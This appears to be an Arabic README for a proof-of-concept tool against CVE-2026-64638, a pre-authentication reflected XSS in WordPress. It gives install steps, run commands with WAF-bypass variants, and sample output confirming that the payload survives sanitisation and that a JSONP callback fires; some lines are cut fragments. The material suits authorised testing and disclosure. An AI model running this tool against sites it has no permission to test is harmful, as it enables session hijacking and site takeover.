
يتحقق من XSS المنعكس قبل المصادقة في WordPress، ويبصم الإصدارات المعرضة للخطر، ويفحص انعكاس الحمولة وJSONP، ويُنشئ ملفات إثبات المفهوم (PoC) بصيغتي HTML وcurl.
أداة إثبات مفهوم (PoC) للتحقق من CVE-2026-64638، وهي ثغرة برمجة نصية عبر المواقع (XSS) منعكسة قبل المصادقة تؤثر على تثبيتات ووردبريس (الإصدارات 6.4 – 7.0.2).
تعمل هذه الأداة على أتمتة عملية بصمة الإصدار والتحقق وتوليد إثبات المفهوم (PoC) لثغرة CVE-2026-64638. وهي تؤكد بأمان ما إذا كان تثبيت ووردبريس المستهدف عرضة لثغرة XSS المنعكسة قبل المصادقة دون نشر حمولات ضارة. إذا تم تأكيد أن الهدف عرضة للثغرة، فبإمكانها توليد ملف PoC بصيغة HTML لاختبارات الأمان المصرح بها وإدراجه في تقارير مكافآت الاختراق.
standard, envelope, waf) لاختبار سيناريوهات تصفية مختلفة.readme.html أو معاملات البرامج النصية المدرجة.wp-login.php يمكن الوصول إليها وتعمل بشكل صحيح.wp-login.php ويتحقق مما إذا كانت عناصر DOM المطلوبة (مثل ajaxurl وcolor-picker) تنجو من التعقيم في الاستجابة.requests>=2.31.0, urllib3استنسخ المستودع وثبّت التبعيات المطلوبة:
git clone https://github.com/your-username/xss2shell-poc.git
cd xss2shell-poc
pip install -r requirements.txt
لا تتطلب هذه الأداة أي متغيرات بيئة أو ملفات إعداد معقدة. يتم تمرير جميع المعاملات مباشرة عبر وسائط سطر الأوامر.
شغّل الأداة باستخدام Python 3 ضد هدف مصرح به.
python3 xss2shell_poc.py -t https://target.com --check-only
python3 xss2shell_poc.py -t https://target.com
إذا تم حظر الحمولة القياسية بواسطة جدار حماية تطبيقات الويب (WAF) أو أعادت نقطة نهاية REST رمز HTTP 401، فجرّب الأنواع البديلة:
python3 xss2shell_poc.py -t https://target.com --variant waf
python3 xss2shell_poc.py -t https://target.com --variant envelope
python3 xss2shell_poc.py -t https://target.com -o custom_poc.html
.
├── .gitignore
├── CONTRIBUTING.md
├── LICENSE
├── README.md
├── SECURITY.md
├── requirements.txt
└── xss2shell_poc.py
Target : https://target.com
Variant : standard
Mode : Full PoC
[>] Phase 1 — WordPress Version Fingerprint
[+] WordPress 7.0.2 — VULNERABLE (6.4 – 7.0.2)
[>] Phase 2 — Confirm Login Page
[+] wp-login.php reachable (HTTP 200)
[>] Phase 3 — Testing XSS Payload (variant: standard)
[+] XSS PAYLOAD SURVIVED SANITIZATION!
[+] Injected DOM elements found in response: ['id="ajaxurl"', 'id="color-picker"']
[>] Phase 4 — REST API JSONP Callback Check
[+] REST JSONP callback works: https://target.com/?rest_route=/&_method=GET&_jsonp=testcb
[+] jQuery will evaluate response as script → XSS fires automatically
يحتوي هذا المستودع على أدوات اختبار متعلقة بالأمان. يرجى الرجوع إلى SECURITY.md للاطلاع على سياسة الإفصاح المسؤول ومتطلبات الاستخدام المصرح به.
نرحب بالمساهمات الاحترافية! يرجى الاطلاع على CONTRIBUTING.md للتفاصيل حول سير العمل ومعايير جودة الكود وإرشادات التقديم.
هذا المشروع مرخص بموجب رخصة MIT.
مخصص للاستخدام المصرح به فقط. يُوفَّر هذا المشروع حصريًا لاختبارات الاختراق المصرح بها وأبحاث الأمن وبرامج مكافآت الاختراق حيث تم منح إذن صريح ومكتوب من مالك النظام. لا تستخدم هذه الأداة ضد أنظمة لا تملكها أو ليس لديك إذن لاختبارها. المؤلفون والمساهمون غير مسؤولين عن أي إساءة استخدام أو ضرر أو عواقب قانونية ناتجة عن استخدام هذا البرنامج.